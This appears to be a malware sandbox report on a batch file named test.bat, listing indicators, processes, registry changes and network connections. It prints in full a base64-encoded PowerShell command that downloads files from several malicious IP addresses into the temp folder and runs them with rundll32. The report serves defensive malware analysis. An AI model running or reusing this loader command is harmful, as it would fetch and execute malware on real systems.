analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

test.bat

Full analysis: https://app.any.run/tasks/43ae3af3-dedf-4ae6-9db3-3087a95c84de
Verdict: Malicious activity
Analysis date: March 31, 2023, 20:14:46
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Indicators:
MIME: text/plain
File info: ASCII text, with very long lines, with no line terminators
MD5:

8D99B7ECEA49432BDF2CF20130CAB942

SHA1:

18FD52F50B11CA500E8686A3A77040A40D7B33FC

SHA256:

A2283B7142181C8D6F3235E4B02656C02CF9D4E88F8C6BA0A2E854AC7524B74F

SSDEEP:

48:bVkkpopi5wDTn+Ar+ylHrx1athEZ4uZ49KFF:b6kpop0wDT+QfNx1aL0pK8

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    No malicious indicators.
  • SUSPICIOUS

    • Starts POWERSHELL.EXE for commands execution

      • cmd.exe (PID: 2744)
    • Base64-obfuscated command line is found

      • cmd.exe (PID: 2744)
    • BASE64 encoded PowerShell command has been detected

      • cmd.exe (PID: 2744)
    • Reads the Internet Settings

      • powershell.exe (PID: 2428)
    • Unusual connection from system programs

      • powershell.exe (PID: 2428)
    • Reads Microsoft Outlook installation path

      • powershell.exe (PID: 2428)
    • Connects to the server without a host name

      • powershell.exe (PID: 2428)
    • Reads Internet Explorer settings

      • powershell.exe (PID: 2428)
  • INFO

    • The process checks LSA protection

      • powershell.exe (PID: 2428)
    • Reads security settings of Internet Explorer

      • powershell.exe (PID: 2428)
    • Create files in a temporary directory

      • powershell.exe (PID: 2428)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
screenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
37
Monitored processes
2
Malicious processes
2
Suspicious processes
0

Behavior graph

Click at the process to see the details
start cmd.exe no specs powershell.exe

Process information

PID
CMD
Path
Indicators
Parent process
2744"C:\Windows\System32\cmd.exe" /k C:\Users\admin\AppData\Local\Temp\test.batC:\Windows\System32\cmd.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Images
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
2428powershell.exe -encodedcommand "UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMgA7ACQAYwBvAGEAZwB1AGwAYQBuAHQAcwBPAHAAaQBzAHQAaABvAHIAYwBoAGkAcwAgAD0AIAAoACIAaAB0AHQAcAA6AC8ALwA5ADQALgAxADMAMQAuADEAMQA3AC4AMQAxADEALwBkAHAAUABOAEwAZgBoAGgAVgBNAGQAZQAuAGQAYQB0ACwAaAB0AHQAcAA6AC8ALwAxADkAOQAuADIANAA3AC4AMwAwAC4AMgAwADMALwBzAEIAdwBtAGEALgBkAGEAdAAsAGgAdAB0AHAAOgAvAC8AMQA0ADEALgA5ADQALgA4ADYALgA5ADAALwBuAGwAOABpADYAVQBNAEEANQAuAGQAYQB0ACwAaAB0AHQAcAA6AC8ALwAxADAANAAuADIAMgA1AC4AMQAyADkALgAxADEANAAvADIAcwBYAEgAcQBqAHAAbAB0AFkAYgAuAGQAYQB0ACwAaAB0AHQAcAA6AC8ALwAyADEANgAuADEANAA2AC4AMgA1AC4AMQAyADkALwBVAHgAMwAxADgALgBkAGEAdAAsAGgAdAB0AHAAOgAvAC8AOAA1AC4AMgAzADkALgA0ADEALgAyADAANQAvADYAdgBxAEMAQgBGAEYAdABnAC4AZABhAHQAIgApAC4AcwBwAGwAaQB0ACgAIgAsACIAKQA7AGYAbwByAGUAYQBjAGgAIAAoACQAUABlAHIAdABoAG8AcABoAHkAdABlACAAaQBuACAAJABjAG8AYQBnAHUAbABhAG4AdABzAE8AcABpAHMAdABoAG8AcgBjAGgAaQBzACkAIAB7AHQAcgB5ACAAewB3AGcAZQB0ACAAJABQAGUAcgB0AGgAbwBwAGgAeQB0AGUAIAAtAFQAaQBtAGUAbwB1AHQAUwBlAGMAIAAxADcAIAAtAE8AIAAkAGUAbgB2ADoAVABFAE0AUABcAHMAaABhAG0AZQBsAGUAcwBzAGwAeQBDAG8AdQBuAHQAZQByAHcAZQBpAGcAaABlAGQALgBNAHUAcwBjAHUAbABhAHIAaQB0AGkAZQBzADsAaQBmACAAKAAoAEcAZQB0AC0ASQB0AGUAbQAgACQAZQBuAHYAOgBUAEUATQBQAFwAcwBoAGEAbQBlAGwAZQBzAHMAbAB5AEMAbwB1AG4AdABlAHIAdwBlAGkAZwBoAGUAZAAuAE0AdQBzAGMAdQBsAGEAcgBpAHQAaQBlAHMAKQAuAGwAZQBuAGcAdABoACAALQBnAGUAIAAxADAAMAAwADAAMAApACAAewBzAHQAYQByAHQAIAByAHUAbgBkAGwAbAAzADIAIAAkAGUAbgB2ADoAVABFAE0AUABcAFwAcwBoAGEAbQBlAGwAZQBzAHMAbAB5AEMAbwB1AG4AdABlAHIAdwBlAGkAZwBoAGUAZAAuAE0AdQBzAGMAdQBsAGEAcgBpAHQAaQBlAHMALABYADUANQA1ADsAYgByAGUAYQBrADsAfQB9AGMAYQB0AGMAaAAgAHsAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMgA7AH0AfQA="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Version:
10.0.14409.1005 (rs1_srvoob.161208-1155)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\lpk.dll
c:\windows\system32\atl.dll
Total events
1 928
Read events
1 912
Write events
16
Delete events
0

Modification events

(PID) Process:(2428) powershell.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:ProxyBypass
Value:
1
(PID) Process:(2428) powershell.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:IntranetName
Value:
1
(PID) Process:(2428) powershell.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:UNCAsIntranet
Value:
1
(PID) Process:(2428) powershell.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:AutoDetect
Value:
0
Executable files
0
Suspicious files
4
Text files
0
Unknown types
0

Dropped files

PID
Process
Filename
Type
2428powershell.exeC:\Users\admin\AppData\Local\Temp\vj0bhboq.x04.psm1binary
MD5:C4CA4238A0B923820DCC509A6F75849B
SHA256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
2428powershell.exeC:\Users\admin\AppData\Local\Temp\mlss14x4.4ea.ps1binary
MD5:C4CA4238A0B923820DCC509A6F75849B
SHA256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
3
TCP/UDP connections
4
DNS requests
0
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2428
powershell.exe
GET
199.247.30.203:80
http://199.247.30.203/sBwma.dat
NL
malicious
2428
powershell.exe
GET
104.225.129.114:80
http://104.225.129.114/2sXHqjpltYb.dat
US
malicious
2428
powershell.exe
GET
404
141.94.86.90:80
http://141.94.86.90/nl8i6UMA5.dat
FR
html
146 b
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2428
powershell.exe
94.131.117.111:80
ZAYO-6461
US
malicious
2428
powershell.exe
141.94.86.90:80
OVH SAS
FR
malicious
199.247.30.203:80
AS-CHOOPA
NL
malicious
104.225.129.114:80
SHOCK-1
US
malicious

DNS requests

No data

Threats

PID
Process
Class
Message
2428
powershell.exe
Not Suspicious Traffic
ET INFO Windows Powershell User-Agent Usage
2428
powershell.exe
Not Suspicious Traffic
ET INFO Windows Powershell User-Agent Usage
2428
powershell.exe
Not Suspicious Traffic
ET INFO Windows Powershell User-Agent Usage
3 ETPRO signatures available at the full report
No debug info